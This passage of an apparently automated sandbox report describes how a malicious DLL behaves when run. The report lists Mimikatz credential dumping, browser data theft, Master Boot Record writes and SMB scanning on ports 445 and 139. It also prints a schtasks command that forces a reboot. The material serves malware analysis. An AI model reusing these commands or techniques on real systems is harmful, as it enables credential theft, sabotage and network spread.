File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\PushConnect.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B3F4.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2000 wrote to memory of 2100 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2100 wrote to memory of 2520 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2100 wrote to memory of 2520 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2100 wrote to memory of 2520 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2100 wrote to memory of 2520 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2100 wrote to memory of 2684 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\B3F4.tmp
PID 2100 wrote to memory of 2684 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\B3F4.tmp
PID 2100 wrote to memory of 2684 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\B3F4.tmp
PID 2100 wrote to memory of 2684 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\B3F4.tmp
PID 2520 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2520 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2520 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2520 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

C:\Users\Admin\AppData\Local\Temp\B3F4.tmp

"C:\Users\Admin\AppData\Local\Temp\B3F4.tmp" \\.\pipe\{1C2D00D1-472B-410E-AD18-E8080324C550}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/2100-0-0x0000000001EF0000-0x0000000001F4E000-memory.dmp

memory/2100-8-0x0000000001EF0000-0x0000000001F4E000-memory.dmp

memory/2100-11-0x0000000001EF0000-0x0000000001F4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B3F4.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2100-9-0x0000000001EF0000-0x0000000001F4E000-memory.dmp

memory/2100-26-0x0000000001EF0000-0x0000000001F4E000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BE7D.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\ExportExpand.xlsx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BE7D.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

C:\Users\Admin\AppData\Local\Temp\BE7D.tmp

"C:\Users\Admin\AppData\Local\Temp\BE7D.tmp" \\.\pipe\{6558F945-D5BC-4684-ABFF-EE1F029B4C65}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
N/A 10.127.0.0:445 tcp
DE 136.243.76.21:445 tcp
US 52.185.211.133:445 settings-win.data.microsoft.com tcp
N/A 10.127.0.1:445 tcp
DE 136.243.76.21:139 tcp
N/A 10.127.0.1:139 tcp
US 52.185.211.133:139 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
